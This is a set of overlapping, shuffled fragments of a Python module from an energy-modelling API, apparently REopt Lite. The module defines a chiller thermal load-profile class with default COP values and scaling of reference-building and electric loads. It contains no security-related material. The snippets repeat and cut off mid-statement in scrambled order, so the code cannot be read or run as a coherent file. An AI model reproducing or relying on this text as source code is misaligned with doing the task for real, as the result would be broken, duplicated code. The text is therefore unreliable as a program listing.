"\"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load,",
"electric LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude :param",
"was unknown at the start of the loop above. This scalar makes it",
"(len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0))",
"< 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None,",
"<reponame>akuam1/REopt_Lite_API<gh_stars>0 from reo.src.load_profile import BuiltInProfile import os import json import pandas as pd",
"= { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None,",
"os import json import pandas as pd import numpy as np from datetime",
"None: #This is a static method so it can be accessible in views.py",
"to see if we need to covert kWh to kWht electric_load_list = None",
"= [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on kwth",
"list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour)",
"to kWht electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton')",
"reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour =",
"on estimated max chiller load if self.chiller_cop is None: if electric_load_list is not",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None,",
"None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply",
"load object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from",
"to covert kWh to kWht electric_load_list = None # Use highest resultion/quality input",
"annual load to each partial load if (len(doe_reference_name) > 1): for i, load",
"time_steps_per_hour self.year = year # Default electric_load_list to None, used later to see",
"(kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is",
"nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1:",
"input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix =",
"are later applied that the total site load will be the sum #",
"of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list))",
"or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can",
"If no doe_reference_name or loads_ton provided, scale by a fraction of electric load",
"kwargs['loads_ton']] # DOE Reference building profile are used if there is a reference",
"DOE Reference building profile are used if there is a reference name provided",
"# In the case where the user supplies a list of doe_reference_names and",
"or loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is",
"self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in",
"import pandas as pd import numpy as np from datetime import datetime from",
"be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else:",
"4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons",
"kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are",
"of doe_reference_names and percent shares # for consistency we want to act as",
"Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city",
"resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient",
"expected to be in units of kWth if electric_load_list is not None: self.load_list",
"combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load to each",
"max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not",
"Annual loads are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\")",
"Default electric_load_list to None, used later to see if we need to covert",
"added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude:",
"thermal factor on peak load for the Chiller :param kwargs: (dict) Chiller specific",
":param latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city: (str)",
"the Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\"",
"def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\"",
"of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist",
"as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55,",
"\\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the",
"or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in units",
":param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year :param",
"we need to covert kWh to kWht electric_load_list = None # Use highest",
"(kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in units of",
":param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year:",
"# when the percent shares are later applied that the total site load",
"not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max chiller",
"= nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year =",
"LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for Chiller :param",
"Update COP based on estimated max chiller load if self.chiller_cop is None: if",
"= kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] =",
"Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load",
"estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None,",
"if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] =",
"max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None,",
"name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for",
"(str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric",
"is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference",
"kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist #",
"None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm",
"= hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a fraction",
"electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not",
"= list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1),",
"Monthly loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] =",
"only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1:",
"factor on peak load for the Chiller :param kwargs: (dict) Chiller specific inputs",
"so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) #",
"load which was unknown at the start of the loop above. This scalar",
"= None # Annual loads are used in place of percent shares if",
"None, used later to see if we need to covert kWh to kWht",
"self.year = year # Default electric_load_list to None, used later to see if",
"is not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons =",
"from parsed inputs :param latitude: (float) site latitude :param longitude: (float) site longitude",
"4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton",
"#Apply the percent share of annual load to each partial load if (len(doe_reference_name)",
"kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal,",
"TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes",
"object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed",
"None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude",
"time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x]",
"x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where",
"list of doe_reference_names and percent shares # for consistency we want to act",
"= max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"]",
"not None: #This is a static method so it can be accessible in",
"defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f:",
"max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else:",
"max chiller load if self.chiller_cop is None: if electric_load_list is not None: #This",
"for consistency we want to act as if we had scaled the partial",
"self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city",
"if electric_load_list is not None: #This is a static method so it can",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons =",
"max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons <",
"elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"]",
"#Calculate COP based on kwth load or kw load (if not user-entered) self.chiller_cop",
"Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak",
"> 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) #",
"peak load for the Chiller :param kwargs: (dict) Chiller specific inputs as defined",
"max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"]",
"max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be accessible",
"#This is a static method so it can be accessible in views.py self.chiller_cop",
"self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i]",
"COP based on estimated max chiller load if self.chiller_cop is None: if electric_load_list",
"int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal",
"= chiller_cop # Update COP based on estimated max chiller load if self.chiller_cop",
"total site # load which was unknown at the start of the loop",
"@staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons =",
"Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None)",
"# Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list =",
"= [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is",
"method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)",
"np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller",
"be the sum # of the default annual loads for this location if",
"1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual",
"always expected to be in units of kWth if electric_load_list is not None:",
"so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else:",
"import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load",
"estimated max chiller load if self.chiller_cop is None: if electric_load_list is not None:",
"on CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r')",
"total site load will be the sum # of the default annual loads",
"or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based",
"percent shares are later applied that the total site load will be the",
"else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None,",
"max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not",
"elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is",
"inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude",
"= list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0))",
"if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not None:",
"percent share of annual load to each partial load if (len(doe_reference_name) > 1):",
"elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is",
"annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40,",
"in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to",
"above. This scalar makes it such that # when the percent shares are",
"the loop above. This scalar makes it such that # when the percent",
"not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\",
":param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int)",
"= LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can",
"= self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] =",
"in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)*",
"longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param",
"loads are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is",
"be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a",
"get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif",
"f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\":",
"kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used in place",
"or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read())",
"and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i,",
"data_manager to which this load object will be added :param total_electric_load_list: (array) electric",
"in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the",
"profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None #",
"[kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on kwth load",
"elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in",
"longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None, used",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs):",
"sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load",
"if we need to covert kWh to kWht electric_load_list = None # Use",
"= self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list",
"that # when the percent shares are later applied that the total site",
"views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be",
"kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list]",
"is not None): #load_list is always expected to be in units of kWt",
":param dfm: (object) data_manager to which this load object will be added :param",
"time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or int)",
"in total_electric_load_list] #Calculate COP based on kwth load or kw load (if not",
"place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] =",
"that the total site load will be the sum # of the default",
"total_electric_load_list] #Calculate COP based on kwth load or kw load (if not user-entered)",
":param chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float",
"hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\")",
"is not None: #This is a static method so it can be accessible",
"= doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs)",
"the sum # of the default annual loads for this location if (len(doe_reference_name)",
"LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes or user-defined",
"with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults",
"shares # for consistency we want to act as if we had scaled",
"a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons",
"pd import numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT",
"electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a",
"self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user",
"supplies a list of doe_reference_names and percent shares # for consistency we want",
"if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads",
"not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP",
"doe_reference_names and percent shares # for consistency we want to act as if",
"this load object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting",
"datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on",
"electric_load_list is not None: #This is a static method so it can be",
"be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always",
"site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile",
"kWh to kWht electric_load_list = None # Use highest resultion/quality input first if",
"None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in",
"TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\",
"reo.src.load_profile import BuiltInProfile import os import json import pandas as pd import numpy",
"'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = {",
"# If no doe_reference_name or loads_ton provided, scale by a fraction of electric",
"supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if",
"or int) maximum thermal factor on peak load for the Chiller :param kwargs:",
"to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None",
"sum # of the default annual loads for this location if (len(doe_reference_name) >",
"loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is not",
"of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"]",
"= self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] =",
"= [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no",
"# Monthly loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy']",
"based on estimated max chiller load if self.chiller_cop is None: if electric_load_list is",
"# Update COP based on estimated max chiller load if self.chiller_cop is None:",
"site load will be the sum # of the default annual loads for",
"latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager",
"chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or",
"self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None, used later",
"site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution",
"= [] for i in range(len(doe_reference_name)): # Monthly loads can only be used",
"kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour",
"for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total",
"from reo.src.load_profile import BuiltInProfile import os import json import pandas as pd import",
"resulting from parsed inputs :param latitude: (float) site latitude :param longitude: (float) site",
"scaled the partial load to the total site # load which was unknown",
"fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) *",
"where the user supplies a list of doe_reference_names and percent shares # for",
"= list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None):",
"* (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\")",
"for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or",
"are used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name =",
"CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as",
"json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69}",
"accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static",
"reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = []",
"max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt",
"loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load",
"dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm:",
"to each partial load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist):",
"electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1),",
"total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude: (float) site",
"* np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list",
"load to the total site # load which was unknown at the start",
"year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance",
"profile are used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name",
"had scaled the partial load to the total site # load which was",
"'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\":",
"location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for",
"is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in",
"shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] =",
"combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist),",
"site # load which was unknown at the start of the loop above.",
"later applied that the total site load will be the sum # of",
"electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for Chiller",
"(int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for",
"input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in",
"(float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time",
"None # Annual loads are used in place of percent shares if provided",
"self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it",
"to None, used later to see if we need to covert kWh to",
"None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile",
"None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt /",
"method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)",
"used later to see if we need to covert kWh to kWht electric_load_list",
"month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw",
"= LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units",
